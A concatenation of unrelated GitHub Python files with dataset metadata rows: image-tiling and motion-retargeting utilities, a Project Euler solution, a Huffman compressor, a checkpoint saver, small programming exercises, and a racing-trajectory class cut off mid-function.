        for tile_row in range(tile_shape[0]):
            for tile_col in range(tile_shape[1]):
                # Skip grid cells beyond the number of available images.
                if tile_row * tile_shape[1] + tile_col < X.shape[0]:
                    this_img = X[tile_row * tile_shape[1] + tile_col]
                    # Scale float inputs up to 0..255 when emitting pixels.
                    c = 1
                    if output_pixel_vals:
                        c = 255
                    out_array[
                        tile_row * (H + Hs): tile_row * (H + Hs) + H,
                        tile_col * (W + Ws): tile_col * (W + Ws) + W,:
                    ] = this_img*c
        return out_array
def show_image(img, title=None, bw=False, per_row=2):
    """Display an image -- or a list of images / (image, title) tuples laid
    out in a grid of *per_row* columns -- with matplotlib. *bw* selects a
    grayscale colormap."""
    cmap = 'viridis' if not bw else 'gray'
    if isinstance(img, list):
        total = len(img)
        plt.title(title)
        per_row = per_row
        cols = np.ceil(total / per_row)
        for id, k in enumerate(img):
            plt.subplot(cols, per_row, 1 + id)
            plt.grid(False)
            if isinstance(k, tuple):
                # (image, per-subplot title) pair
                plt.title(k[1])
                plt.imshow(k[0], cmap=cmap, interpolation='nearest')
            else:
                plt.imshow(k, cmap=cmap, interpolation='nearest')
    else:
        plt.title(title)
        plt.grid(False)
        plt.imshow(img, cmap=cmap, interpolation='nearest')
    plt.tight_layout()
    plt.show()
def oned_to_flat(o):
    """Drop a trailing singleton channel axis and rescale to [0, 1] float64."""
    if o.shape[-1] == 1:
        o = o.reshape((o.shape[0], o.shape[1]))
    normalized = o / o.max()
    return normalized.astype('float64')
def show_representations(model, X_test, number=5, dim=28, do_reshape=True):
    """Run *model* on the first number**2 test samples and display the
    original inputs next to the model's reconstructions, tiled into a
    number x number grid of dim x dim images."""
    representations = model.predict(X_test[:number ** 2, ...])
    def flat_to_shaped(x):
        # Flattened rows -> (N, dim, dim, 1) tiles, unless already shaped.
        return x.reshape((x.shape[0], dim, dim,1)) if do_reshape else x
    _r = tile_raster_images(
        X=flat_to_shaped(representations),
        img_shape=(dim, dim), tile_shape=(number, number),
        tile_spacing=(1, 1), output_pixel_vals=False)
    _o = tile_raster_images(
        X=flat_to_shaped(X_test),
        img_shape=(dim, dim), tile_shape=(number, number),
        tile_spacing=(1, 1), output_pixel_vals=False)
    print(_r.min())
    print(_r.max())
    show_image([(oned_to_flat(_o), 'Source'), (oned_to_flat(_r), 'Representations')])
def keras2rgb(t):
    """Convert a channels-first batch (N, C, H, W) to channels-last (N, H, W, C)."""
    moved = np.swapaxes(t, 1, 2)
    return np.swapaxes(moved, 2, 3)
# Smoke test: load the demo image and display it.
if __name__ == '__main__':
    i = load_demo_image()
    print(i.shape)
    show_image(i)
| nanopony/keras-convautoencoder | helpers.py | helpers.py | py | 5,359 | python | en | code | 174 | github-code | 90 |
74946847015 | # -*- coding: utf-8 -*-
"""
Problem 142 - Perfect Square Collection
Find the smallest x + y + z with integers x > y > z > 0 such that x + y, x − y,
x + z, x − z, y + z, y − z are all perfect squares.
"""
from math import sqrt
def solution():
    """Return the smallest x + y + z for Project Euler problem 142.
    NOTE: Python 2 code (`xrange`; `/` performs integer division here).
    """
    limit = 1000
    # Map every perfect square below (sqrt(2)*limit)^2 to its root for O(1)
    # membership tests.
    squares = {n*n: n for n in xrange(1, int(sqrt(2)*limit))}
    # By using the following equations:
    #
    #   x + y = a²
    #   x - y = b²
    #   x + z = c²
    #   x - z = d²
    #   y + z = e²
    #   y - z = f²
    #
    # and the fact that x > y > z > 0, the following becomes clear:
    #
    #   a² > all the other squares
    #   a² and b² have the same parity
    #   b² < c²
    #   a² - c² = f²
    #   c² - b² = e²
    #   b² + f² = d²
    #
    for a in range(6, limit):
        # b keeps a's parity so that x = (a²+b²)/2 and y = (a²-b²)/2 are whole.
        for b in range(a % 2 or 2, a, 2):
            for c in range(b+1, a):
                fsq = a*a - c*c
                if fsq not in squares:
                    continue
                esq = c*c - b*b
                if esq not in squares:
                    continue
                dsq = b*b + fsq
                if dsq not in squares:
                    continue
                x = (a*a + b*b)/2
                y = (a*a - b*b)/2
                z = (esq - fsq)/2
                if z < 0:
                    continue
                return x + y + z
# Script entry point.
if __name__ == '__main__':
    print(solution())
| yred/euler | python/problem_142.py | problem_142.py | py | 1,452 | python | en | code | 1 | github-code | 90 |
class node(object):
    """Huffman-tree node: carries a weight (``value``), two children and a
    parent pointer."""

    def __init__(self, value=None, left=None, right=None, father=None):
        self.value = value
        self.left = left
        self.right = right
        self.father = father

    def build_father(left, right):
        """Merge two nodes under a new parent whose weight is their sum."""
        parent = node(value=left.value + right.value, left=left, right=right)
        left.father = parent
        right.father = parent
        return parent

    def encode(n):
        """Return the bit path from the root to *n*: b'0' per left edge,
        b'1' per right edge (empty bytes for the root itself)."""
        if n.father is None:
            return b''
        bit = b'0' if n.father.left is n else b'1'
        return node.encode(n.father) + bit
class tree(object):
    def __init__(self):
        # Data initialization (translated from the original Chinese comment)
        self.node_dict = {}     # symbol (bytes) -> its leaf node
        self.count_dict = {}    # symbol (bytes) -> occurrence count
        self.ec_dict = {}       # symbol (bytes) -> Huffman code (b'0'/b'1' string)
        self.nodes = []
        self.inverse_dict = {}  # presumably code -> symbol for decoding; filled elsewhere
    # Huffman tree construction (translated from the original Chinese comment)
    def build_tree(self, l):
        """Recursively merge the two lightest nodes until a single root
        remains; returns a one-element list holding that root."""
        if len(l) == 1:
            return l
        sorts = sorted(l,key = lambda x:x.value,reverse = False)
        n = node.build_father(sorts[0],sorts[1])
        sorts.pop(0)
        sorts.pop(0)
        sorts.append(n)
        return self.build_tree(sorts)
def encode(self, echo):
for x in self.node_dict.keys():
self.ec_dict[x] = node.encode(self.node_dict[x])
if echo == True:
print(x)
print(self.ec_dict[x])
def encodefile(self, inputfile):
print("Starting encode...")
f = open(inputfile,"rb")
bytes_width = 1
i = 0
f.seek(0,2)
count = f.tell() / bytes_width
print(count)
nodes = []
buff = [b''] * int(count)
f.seek(0)
#计算字符频率,并将单个字符构建成单一节点
while i < count:
buff[i] = f.read(bytes_width)
if self.count_dict.get(buff[i], -1) == -1:
self.count_dict[buff[i]] = 0
self.count_dict[buff[i]] = self.count_dict[buff[i]] + 1
i = i + 1
print("Read OK")
print(self.count_dict) #输出权值字典,可注释掉
for x in self.count_dict.keys():
self.node_dict[x] = node(self.count_dict[x])
nodes.append(self.node_dict[x])
f.close()
tree = self.build_tree(nodes)
self.encode(False)
print("Encode OK")
head = sorted(self.count_dict.items(),key = lambda x:x[1] ,reverse = True) #对所有根节点进行排序
bit_width = 1
print("head:",head[0][1])
if head[0][1] > 255:
bit_width = 2
if head[0][1] > 65535:
bit_width = 3
if head[0][1] > 16777215:
bit_width = 4
print("bit_width:",bit_width)
i = 0
raw = 0b1
last = 0
name = inputfile.split('.')
o = open(name[0]+"_.txt" , 'wb')
name = inputfile.split('/')
o.write((name[len(name)-1] + '\n').encode(encoding="utf-8"))#写出原文件名
o.write(int.to_bytes(len(self.ec_dict) ,2 ,byteorder = 'big'))#写出结点数量
o.write(int.to_bytes(bit_width ,1 ,byteorder = 'big'))#写出编码表字节宽度
for x in self.ec_dict.keys():#编码文件头
o.write(x)
o.write(int.to_bytes(self.count_dict[x] ,bit_width ,byteorder = 'big'))
print('head OK')
while i < count:
for x in self.ec_dict[buff[i]]:
raw = raw << 1
if x == 49:
raw = raw | 1
if raw.bit_length() == 9:
raw = raw & (~(1 << 8))
o.write(int.to_bytes(raw ,1 , byteorder = 'big'))
o.flush()
raw = 0b1
tem = int(i /len(buff) * 100)
if tem > last:
# print("encode:", tem ,'%')
last = tem
i = i + 1
if raw.bit_length() > 1:
raw = raw << (8 - (raw.bit_length() - 1))
raw = raw & (~(1 << raw.bit_length() - 1))
o.write(int.to_bytes(raw ,1 , byteorder = 'big'))
o.close()
print("File encode successful.")
def decodefile(self, inputfile):
print("Starting decode...")
count = 0
raw = 0
last = 0
f = open(inputfile ,'rb')
f.seek(0,2)
eof = f.tell()
f.seek(0)
name = inputfile.split('/')
outputfile = inputfile.replace(name[len(name)-1], f.readline().decode(encoding="utf-8"))
o = open(outputfile.replace('\n','') ,'wb')
count = int.from_bytes(f.read(2), byteorder = 'big')
bit_width = int.from_bytes(f.read(1), byteorder = 'big')
i = 0
de_dict = {}
while i < count:
key = f.read(1)
value = int.from_bytes(f.read(bit_width), byteorder = 'big')
de_dict[key] = value
i = i + 1
for x in de_dict.keys():
self.node_dict[x] = node(de_dict[x])
self.nodes.append(self.node_dict[x])
tree = self.build_tree(self.nodes)#重建哈夫曼树
self.encode(False)#建立编码表
for x in self.ec_dict.keys():#反向字典构建
self.inverse_dict[self.ec_dict[x]] = x
i = f.tell()
data = b''
while i < eof:#开始解压数据
raw = int.from_bytes(f.read(1), byteorder = 'big')
# print("raw:",raw)
i = i + 1
j = 8
while j > 0:
if (raw >> (j - 1)) & 1 == 1:
data = data + b'1'
raw = raw & (~(1 << (j - 1)))
else:
data = data + b'0'
raw = raw & (~(1 << (j - 1)))
if self.inverse_dict.get(data, 0) != 0:
o.write(self.inverse_dict[data])
o.flush()
#print("decode",data,":",inverse_dict[data])
data = b''
j = j - 1
tem = int(i / eof * 100)
if tem > last:
# print("decode:", tem,'%')#输出解压进度
last = tem
raw = 0
f.close()
o.close()
print("File decode successful.")
if __name__ == '__main__':
    # Compress several sample files (each writes <name>_.txt).
    # NOTE(review): one `tree` instance is reused for every file, so
    # count_dict/node_dict accumulate across files -- this looks
    # unintended; confirm whether a fresh tree per file was meant.
    temptree = tree()
    temptree.encodefile("lenna1.txt")
    temptree.encodefile("lenna5.txt")
    temptree.encodefile("lenna10.txt")
temptree.encodefile("lenna20.txt") | iamtonymwt/Image-Processing | JPEGpy/Huffman.py | Huffman.py | py | 6,463 | python | en | code | 0 | github-code | 90 |
import logging
import os

import numpy as np
import torch
import wandb
logging.getLogger().setLevel(logging.INFO)
class CheckpointSaver:
    """Keeps the top-N model checkpoints on disk, ranked by a validation
    metric, and logs each saved checkpoint to Weights & Biases.
    """

    def __init__(self, dirpath, decreasing=True, top_n=5):
        """
        dirpath: Directory path where to store all model weights
        decreasing: If decreasing is `True`, then lower metric is better
        top_n: Total number of models to track based on validation metric value
        """
        os.makedirs(dirpath, exist_ok=True)
        self.dirpath = dirpath
        self.top_n = top_n
        self.decreasing = decreasing
        self.top_model_paths = []
        # np.inf (lowercase): the np.Inf alias was removed in NumPy 2.0.
        self.best_metric_val = np.inf if decreasing else -np.inf

    def __call__(self, model, epoch, metric_val):
        """Save and log `model` if `metric_val` improves on the best seen so far."""
        model_path = os.path.join(self.dirpath, model.__class__.__name__ + f'_epoch{epoch}.pt')
        save = metric_val < self.best_metric_val if self.decreasing else metric_val > self.best_metric_val
        if save:
            logging.info(f"Metric value {metric_val} better than best {self.best_metric_val}; saving model at {model_path} & logging model weights to W&B.")
            self.best_metric_val = metric_val
            # Requires `torch` imported at module level (it was missing from
            # the original import block).
            torch.save(model.state_dict(), model_path)
            self.log_artifact(f'model-ckpt-epoch-{epoch}.pt', model_path, metric_val)
            self.top_model_paths.append({'path': model_path, 'score': metric_val})
            # Best first: ascending when lower-is-better, else descending.
            self.top_model_paths = sorted(self.top_model_paths, key=lambda o: o['score'], reverse=not self.decreasing)
        if len(self.top_model_paths) > self.top_n:
            self.cleanup()

    def log_artifact(self, filename, model_path, metric_val):
        """Upload the checkpoint file to W&B, tagged with its validation score."""
        artifact = wandb.Artifact(filename, type='model', metadata={'Validation score': metric_val})
        artifact.add_file(model_path)
        wandb.run.log_artifact(artifact)

    def cleanup(self):
        """Delete the tracked checkpoints beyond the best `top_n` from disk."""
        to_remove = self.top_model_paths[self.top_n:]
        logging.info(f"Removing extra models.. {to_remove}")
        for o in to_remove:
            os.remove(o['path'])
        self.top_model_paths = self.top_model_paths[:self.top_n]
checkpoint_saver = CheckpointSaver(dirpath='./model_weights', decreasing=True, top_n=5) | makcfd/exploiting-ml-multimodality | my_utilities/logger.py | logger.py | py | 2,214 | python | en | code | 1 | github-code | 90 |
5231802271 | print("************欢迎来到宠物店**************")
# Pet record shared by the classes below: name, species ("type"),
# health (0-100) and intimacy ("value").
dictionary={}
dictionary["name"] = input("请问你的宠物取一个名字")
value = 0
dictionary["value"] = 0  # intimacy starts at zero
class animal():
    """Interactive pet creation: asks the user for species, breed and an
    initial health value, storing everything in the module-level
    `dictionary` record (not on the instance)."""
    def __init__(self):
        # 1 = dog, 2 = penguin.
        typeanimal = int(input("请选择宠物类型:1、狗狗;2、企鹅"))
        if typeanimal == 1:
            typedog = int(input("请选择狗的品种:1、聪明的拉布拉多犬;2、酷酷的雪纳瑞"))
            if typedog == 1:
                typedog ="聪明的拉布拉多犬"
                dictionary["type"]=typedog
                print("恭喜你获得了一只聪明的拉布拉多犬")
            elif typedog == 2:
                typedog ="酷酷的雪纳瑞"
                dictionary["type"] = typedog
                print("恭喜你获得了一只酷酷的雪纳瑞")
        elif typeanimal == 2:
            typepenguin = int(input("请选择企鹅的品种:1、迷你的小企鹅;2、胖胖的大企鹅"))
            if typepenguin == 1:
                typepenguin ="迷你的小企鹅"
                dictionary["type"] = typepenguin
                print("恭喜你获得了一只迷你的小企鹅")
            elif typepenguin== 2:
                typepenguin ="胖胖的大企鹅"
                dictionary["type"] = typepenguin
                print("恭喜你获得了一只胖胖的大企鹅")
        # Re-prompt until the health value is within [0, 100].
        while True:
            health = int(input("请输入宠物的健康值0—100之间"))
            if 0<=health<=100:
                dictionary["health"]= health
                break
            else:
                print("输入错误,请重新输入")
    def intimacy(self):
        # Placeholder: overridden by subclasses.
        pass
    @classmethod
    def allshow(cls):
        """Print a table of all pets in the module-level `pet` list."""
        print("宠物名称\t\t\t种类\t\t\t健康值\t\t\t亲密度")
        for temp in pet:
            print("%s%16s%16s%16s" % (temp["name"], temp["type"], temp["health"], temp["value"]))
class dog(animal):
    """Dog interactions: option 1 and 2 adjust health/intimacy of every pet
    in the module-level `pet` list."""
    # def __init__(self):
    #     super().__init__()
    @classmethod
    def intimacy(cls):
        # NOTE(review): the menus printed by the caller promise
        # "1: health-10, intimacy+5 / 2: health+5, intimacy+1", but here
        # play==1 adds health and play==2 subtracts it -- confirm which
        # mapping is intended.
        play=int(input())
        if play == 1:
            for temp in pet:
                if temp["health"]<10:
                    # Refuse the action when the pet would die.
                    print("无法执行该操作,否则宠物死亡")
                else:
                    # Intimacy is capped at 100.
                    if temp["value"]>=100:
                        temp["value"] =100
                    else:
                        temp["value"]=temp["value"]+5
                    temp["health"]=temp["health"]+5
        elif play == 2:
            for temp in pet:
                if temp["value"]>=100:
                    temp["value"] =100
                else:
                    temp["value"]=temp["value"]+5
                temp["health"]=temp["health"]-10
class punguin(dog):
    """Penguin pet; inherits all behaviour (including intimacy) from dog."""
    def __init__(self):
        super().__init__()
# Create one pet interactively, register it, then run the interaction menu.
A=animal()
pet=[]
pet.append(dictionary)
print("\n")
print("以下是你的宠物")
dog.allshow()
print("\n")
while True:
    # Main menu: 1 = interact with the pet, 2 = quit.
    print("选择下面功能\n与宠物互动请按1\n退出宠物系统请按2")
    p = int(input())
    if p==1:
        for temp in pet:
            # Dogs and penguins get species-specific interaction menus.
            if "聪明的拉布拉多犬"== temp["type"]or temp["type"]=="酷酷的雪纳瑞":
                print("1.与你的狗狗玩接飞盘游戏,健康值-10,亲密度+5\n2.让你的狗狗休息,健康值+5,亲密度+1")
                dog.intimacy()
            else:
                print("1.与你的企鹅竞走比赛,健康值-10,亲密度+5\n2.让你的企鹅休息,健康值+5,亲密度+1")
                punguin.intimacy()
        print("玩游戏后宠物属性\n")
        dog.allshow()
    elif p==2:
        break
    else:
        print("输入错误,请重新输入")
| zou9229/InternshipStudy | demo1.py | demo1.py | py | 3,660 | python | en | code | 0 | github-code | 90 |
18110796049 | from collections import deque
def doubly(n):
    """Process `n` doubly-linked-list commands read from stdin
    ("insert x", "delete x", "deleteFirst", "deleteLast") and print the
    final list front-to-back (AOJ ALDS1_3_C style)."""
    list = deque()  # NOTE(review): shadows the builtin `list`
    for i in range(n):
        line = input().split()
        p = line[0]
        # deleteFirst/deleteLast carry no argument; the try/except simply
        # leaves `key` unset in that case (the while loop runs once).
        while True:
            try:
                key = line[1]
                break
            except IndexError:
                break
        if p == "insert":
            list.appendleft(key)
        elif p == "deleteFirst":
            list.popleft()
        elif p == "deleteLast":
            list.pop()
        else:
            # "delete x": remove the first occurrence of x, ignoring
            # the command when x is absent (ValueError).
            while True:
                try:
                    list.remove(key)
                    break
                except ValueError:
                    break
    print(' '.join(list))
if "__main__" == __name__:
    # First stdin line is the command count; one command per following line.
    n = int(input())
    doubly(n)
| Aasthaengg/IBMdataset | Python_codes/p02265/s632640942.py | s632640942.py | py | 728 | python | en | code | 0 | github-code | 90 |
18124708729 | s = int(input())
# Convert `s` seconds (read above) to "h:m:s" without zero padding.
# NOTE(review): `min` shadows the builtin min() for the rest of the script.
sec = min = hour = 0
sec = s%60
if s >= 60:
    min = int(s/60)
    if min >= 60:
        hour = int(min/60)
        min = min%60
print(str(hour) + ':' + str(min) + ':' + str(sec))
| Aasthaengg/IBMdataset | Python_codes/p02390/s966185220.py | s966185220.py | py | 199 | python | en | code | 0 | github-code | 90 |
16471101084 | from scipy.ndimage import gaussian_filter1d
import numpy as np
import json
import os
import torch
def trans_motion3d(motion3d, local3d=None, unit=128):
    """Orthographically project a (J, 3, T) 3D motion to 2D and convert it to
    the local, root-relative representation used by the network."""
    # Orthonormal projection: scale to pixel-ish units first.
    scaled = motion3d * unit

    # Synthesize neck (1) and mid-hip (8) as shoulder / hip midpoints.
    scaled[1, :, :] = (scaled[2, :, :] + scaled[5, :, :]) / 2
    scaled[8, :, :] = (scaled[9, :, :] + scaled[12, :, :]) / 2

    if local3d is not None:
        # Project onto the (x, z) axes of the supplied local frame.
        projected = local3d[[0, 2], :] @ scaled  # (15, 2, 64)
    else:
        projected = scaled[:, [0, 2], :]  # (15, 2, 64)

    # Flip the vertical axis (image coordinates grow downwards).
    projected[:, 1, :] = -projected[:, 1, :]
    return trans_motion2d(projected)
def trans_motion2d(motion2d):
    """Convert a (J, 2, T) global 2D motion to local coordinates: every joint
    becomes relative to the mid-hip (joint 8), whose per-frame displacement
    is appended as a final velocity channel."""
    root = motion2d[8, :, :]
    local = motion2d - root

    # Per-frame root displacement, with a zero column prepended for frame 0.
    step = root[:, 1:] - root[:, :-1]
    velocity = np.c_[np.zeros((2, 1)), step].reshape(1, 2, -1)

    # Drop the (now all-zero) root joint and append the velocity channel.
    return np.r_[local[:8], local[9:], velocity]
def trans_motion_inv(motion, sx=256, sy=256, velocity=None):
    """Invert trans_motion2d: re-insert the root joint and restore global
    coordinates.

    Args:
        motion: (J, 2, T) local motion whose last channel is the root velocity.
        sx, sy: global position assigned to the root in the first frame step.
        velocity: optional (2, T) override for the velocity channel.

    Returns:
        (J, 2, T) motion in global coordinates.
    """
    if velocity is None:
        velocity = motion[-1].copy()
    # Re-insert an all-zero root joint at index 8 and drop the velocity channel.
    motion_inv = np.r_[motion[:8], np.zeros((1, 2, motion.shape[-1])), motion[8:-1]]

    # Integrate the per-frame velocity to recover the root trajectory
    # (np.cumsum replaces the original O(T) Python accumulation loop and
    # produces the identical running sums), then shift by the start position.
    centers = np.cumsum(velocity, axis=1) + np.array([[sx], [sy]])
    return motion_inv + centers.reshape((1, 2, -1))
def normalize_motion(motion, mean_pose, std_pose):
    """
    :param motion: (J, 2, T)
    :param mean_pose: (J, 2)
    :param std_pose: (J, 2)
    :return: standardized motion, same shape as `motion`
    """
    # Broadcast the per-joint statistics over the time axis.
    mean = mean_pose[:, :, np.newaxis]
    std = std_pose[:, :, np.newaxis]
    return (motion - mean) / std
def normalize_motion_inv(motion, mean_pose, std_pose):
    """Undo normalize_motion.  Also accepts a flattened (J*2, T) motion,
    which is reshaped to (J, 2, T) first."""
    if motion.ndim == 2:
        motion = motion.reshape(-1, 2, motion.shape[-1])
    return motion * std_pose[:, :, np.newaxis] + mean_pose[:, :, np.newaxis]
def preprocess_motion2d(motion, mean_pose, std_pose):
    """Root-center, standardize and flatten a (J, 2, T) motion into a
    (1, J*2, T) torch tensor ready for the network."""
    normalized = normalize_motion(trans_motion2d(motion), mean_pose, std_pose)
    flat = normalized.reshape((-1, normalized.shape[-1]))
    return torch.Tensor(flat).unsqueeze(0)
def postprocess_motion2d(motion, mean_pose, std_pose, sx=256, sy=256):
    """Inverse of preprocess_motion2d: network tensor -> global-coordinate
    numpy motion anchored at (sx, sy)."""
    arr = motion.detach().cpu().numpy()[0].reshape(-1, 2, motion.shape[-1])
    denormalized = normalize_motion_inv(arr, mean_pose, std_pose)
    return trans_motion_inv(denormalized, sx, sy)
def get_local3d(motion3d, angles=None):
    """Build the unit axes of a body-local rectangular frame for a 3D motion.

    :param motion3d: numpy array, shape (nr_joints, 3, nr_frames).
    :param angles: optional tuple of 3 rotation angles applied to the frame.
    :return: (3, 3) array whose rows are the local x/y/z unit vectors.
    """
    # Joints: 2 RightArm, 5 LeftArm, 9 RightUpLeg, 12 LeftUpLeg.
    lateral = (motion3d[2] - motion3d[5] + motion3d[9] - motion3d[12]) / 2
    horizontal = np.mean(lateral, axis=1)
    horizontal = horizontal / np.linalg.norm(horizontal)

    axis_z = np.array([0, 0, 1])
    # Known upstream caveat: horizontal and axis_z may not be perpendicular,
    # so the resulting axes are only approximately orthonormal.
    axis_y = np.cross(horizontal, axis_z)
    axis_y = axis_y / np.linalg.norm(axis_y)
    axis_x = np.cross(axis_y, axis_z)

    frame = np.stack([axis_x, axis_y, axis_z], axis=0)
    if angles is not None:
        frame = rotate_coordinates(frame, angles)
    return frame
def rotate_coordinates(local3d, angles):
    """Rotate a local frame: Rodrigues rotation about its own x axis by
    angles[0], then a rotation about the global z axis by angles[2].

    :param local3d: (3, 3) array of local unit vectors (rows x, y, z).
    :param angles: tuple of 3 rotation angles (the y angle is unused,
        matching the original implementation).
    :return: rotated (3, 3) frame.
    """
    cos_x, cos_y, cos_z = np.cos(angles)
    sin_x, sin_y, sin_z = np.sin(angles)

    axis = local3d[0]
    # Skew-symmetric cross-product matrix of the x axis (Rodrigues' formula).
    skew = np.array([
        [0.0, -axis[2], axis[1]],
        [axis[2], 0.0, -axis[0]],
        [-axis[1], axis[0], 0.0],
    ])
    col = axis.reshape(-1, 1)
    rot_x = cos_x * np.eye(3) + sin_x * skew + (1.0 - cos_x) * (col @ col.T)

    rot_z = np.array([
        [cos_z, sin_z, 0.0],
        [-sin_z, cos_z, 0.0],
        [0.0, 0.0, 1.0],
    ])

    return local3d @ rot_x.T @ rot_z
def rotation_matrix_along_axis(x, angle):
    """Rodrigues rotation matrix for a rotation of `angle` radians about the
    unit axis `x` (a length-3 numpy array)."""
    c = np.cos(angle)
    s = np.sin(angle)
    # Skew-symmetric cross-product matrix of the axis.
    skew = np.array([
        [0.0, -x[2], x[1]],
        [x[2], 0.0, -x[0]],
        [-x[1], x[0], 0.0],
    ])
    col = x.reshape(-1, 1)
    return c * np.eye(3) + s * skew + (1.0 - c) * (col @ col.T)
def openpose2motion(json_dir, scale=1.0, smooth=True, max_frame=None):
    """Load per-frame OpenPose keypoint JSONs from `json_dir` into a
    (15, 2, T) motion array, filling undetected (zero) joints from
    neighbouring frames and optionally smoothing over time."""
    json_files = sorted(os.listdir(json_dir))
    # Truncate to a multiple of 8 frames unless max_frame is given.
    length = max_frame if max_frame is not None else len(json_files) // 8 * 8
    json_files = json_files[:length]
    json_files = [os.path.join(json_dir, x) for x in json_files]

    motion = []
    for path in json_files:
        with open(path) as f:
            jointDict = json.load(f)
            # First detected person only; keep 15 joints, drop confidences.
            joint = np.array(jointDict['people'][0]['pose_keypoints_2d']).reshape((-1, 3))[:15, :2]
            # Forward fill: zero (undetected) joints inherit the previous frame.
            if len(motion) > 0:
                joint[np.where(joint == 0)] = motion[-1][np.where(joint == 0)]
            motion.append(joint)

    # Backward fill: zeros remaining near the start are copied from later frames.
    for i in range(len(motion) - 1, 0, -1):
        motion[i - 1][np.where(motion[i - 1] == 0)] = motion[i][np.where(motion[i - 1] == 0)]

    motion = np.stack(motion, axis=2)
    if smooth:
        motion = gaussian_filter1d(motion, sigma=2, axis=-1)
    motion = motion * scale
    return motion
def get_foot_vel(batch_motion, foot_idx):
    """Per-frame velocity of the foot channels of a (B, C, T) batch, with the
    root velocity (stored in the last two channels) added back in."""
    feet = batch_motion[:, foot_idx]
    # Root velocity lives in the final two channels; tile it to match
    # the four foot channels.
    root_vel = batch_motion[:, -2:, 1:].repeat(1, 2, 1)
    return feet[:, :, 1:] - feet[:, :, :-1] + root_vel
| ChrisWu1997/2D-Motion-Retargeting | functional/motion.py | motion.py | py | 5,730 | python | en | code | 406 | github-code | 90 |
17931367669 | s = str(input())
# Insert '+' or '-' between the 4 digits of `s` (read above) so the
# expression evaluates to 7, then print e.g. "1+2+2+2=7".
n = 4
for bit in range(1 << (n-1)):
    # Each bit of `bit` picks the operator before digit i+1.
    f = s[0]
    for i in range(0,(n-1)):
        if bit & (1 << i):
            # '+-' trick: splitting on '+' later yields '-d', which
            # int() parses as a negative term.
            f += '+-' + s[i+1]
        else:
            f += '+' + s[i+1]
    #print(f)
    ans = sum(map(int,f.split('+')))
    if ans == 7:
        break
print(f.replace('+-','-')+'=7')
| Aasthaengg/IBMdataset | Python_codes/p03545/s485526884.py | s485526884.py | py | 311 | python | en | code | 0 | github-code | 90 |
73951271976 | from dataclasses import dataclass
import numpy as np
import copy
from scipy import interpolate
from scipy.interpolate import BSpline
from scipy.integrate import quad
from shapely.geometry import Point, LinearRing, GeometryCollection, LineString, MultiPoint, Polygon
import pickle
@dataclass
class Region:
    """A named polygonal area of the track identified by an integer code."""
    name: str
    code: int
    vertices: np.ndarray  # n * 2 polygon vertices (x, y)
@dataclass
class Bound:
    """A named track boundary polyline (e.g. left/right edge)."""
    name: str
    type: str
    vertices: np.ndarray  # n * 2 boundary vertices (x, y)
class Trajectory:
    """A closed (looping) trajectory sampled at discrete waypoints.

    `points` is an (N, 19) float64 array; the class constants below name its
    columns.  Helper methods fill the derived columns (bounds, arc length,
    per-segment time, region codes).
    """

    # Column indices into `points`.
    X = 0
    Y = 1
    Z = 2
    YAW = 3
    SPEED = 4
    CURVATURE = 5
    DIST_TO_SF_BWD = 6   # arc length travelled from the start/finish line
    DIST_TO_SF_FWD = 7   # arc length remaining to the start/finish line
    REGION = 8
    LEFT_BOUND_X = 9
    LEFT_BOUND_Y = 10
    RIGHT_BOUND_X = 11
    RIGHT_BOUND_Y = 12
    BANK = 13
    LON_ACC = 14
    LAT_ACC = 15
    TIME = 16
    IDX = 17
    ITERATION_FLAG = 18

    def __init__(self, num_point: int, ttl_num: int = 0, origin=None) -> None:
        """Allocate `num_point` zeroed waypoints.

        Args:
            num_point: number of samples along the loop.
            ttl_num: TTL identifier written into the header on save_ttl.
            origin: optional 3-tuple written into the TTL header -- assumed
                to be a map/geodetic origin; TODO confirm with save_ttl users.
        """
        self.ttl_num = ttl_num
        self.origin = origin
        self.points = np.zeros((num_point, 19), dtype=np.float64)
        self.points[:, Trajectory.IDX] = np.arange(0, len(self.points), 1)
        self.points[:, Trajectory.ITERATION_FLAG] = -1

    def __getitem__(self, key):
        return self.points[key]

    def __setitem__(self, key, val):
        self.points[key] = val

    def __len__(self):
        return len(self.points)

    def __iter__(self):
        for pt in self.points:
            yield pt

    def copy(self):
        """Return an independent copy (the points array is duplicated)."""
        new_traj = Trajectory(len(self.points))
        new_traj.points = self.points.copy()
        return new_traj

    def inc(self, idx: int):
        """Next index along the loop, wrapping past the last point."""
        if idx + 1 == len(self.points):
            return 0
        else:
            return idx + 1

    def dec(self, idx: int):
        """Previous index along the loop, wrapping below zero."""
        if idx - 1 < 0:
            return len(self.points) - 1
        else:
            return idx - 1

    def fill_bounds(self, left_poly, right_poly, max_dist=100.0):
        """Populate LEFT/RIGHT_BOUND_X/Y by intersecting each waypoint's
        normal with the left/right boundary geometries.

        Args:
            left_poly, right_poly: shapely geometries for the track edges.
            max_dist: half-length of the normal segment cast to each side.
        """

        def find_intersect(wp: np.ndarray, poly: LinearRing, norm, max_dist):
            # Cast a 2*max_dist segment through the waypoint, rotated by
            # `norm` relative to its yaw; return (distance, closest point).
            yaw_tan, x, y = wp[Trajectory.YAW], wp[Trajectory.X], wp[Trajectory.Y]
            traj_pt = Point(x, y)
            yaw_norm = yaw_tan + norm
            max_norm = (x + max_dist * np.cos(yaw_norm),
                        y + max_dist * np.sin(yaw_norm))
            min_norm = (x + max_dist * np.cos(yaw_norm + np.pi),
                        y + max_dist * np.sin(yaw_norm + np.pi))
            line_norm = LineString((min_norm, max_norm))
            some_intersects = line_norm.intersection(poly)
            this_some_distance = max_dist
            this_some_intersection = None
            if type(some_intersects) in (GeometryCollection, MultiPoint):
                # Several crossings: keep the point closest to the waypoint.
                distances = []
                intersections = []
                for intersection in list(some_intersects.geoms):
                    if type(intersection) is Point:
                        distances.append(
                            traj_pt.distance(intersection))
                        intersections.append(intersection)
                    else:
                        # NOTE(review): `poly.name` is not a standard shapely
                        # attribute -- confirm the geometries passed in carry
                        # one, otherwise this error path itself raises.
                        print(
                            f"Issue with boundary at index {wp[Trajectory.IDX]}: intersection with {poly.name} is not a Point but {type(intersection)}.")
                if len(distances) == 0:
                    print(
                        f"Issue with boundary at index {wp[Trajectory.IDX]}: no Point intersection found with Geometry of name {poly.name}.")
                else:
                    min_dist_idx = np.argmin(np.array(distances))
                    this_some_distance = distances[min_dist_idx]
                    this_some_intersection = intersections[min_dist_idx]
            elif type(some_intersects) is Point:
                this_some_distance = traj_pt.distance(
                    some_intersects)
                this_some_intersection = some_intersects
            else:
                # No intersection at all: fall back to the waypoint itself.
                return 0.0, traj_pt
            return this_some_distance, this_some_intersection

        def calc_left_right_bounds(wp):
            # Left bound is +90 deg from the yaw direction, right is -90 deg.
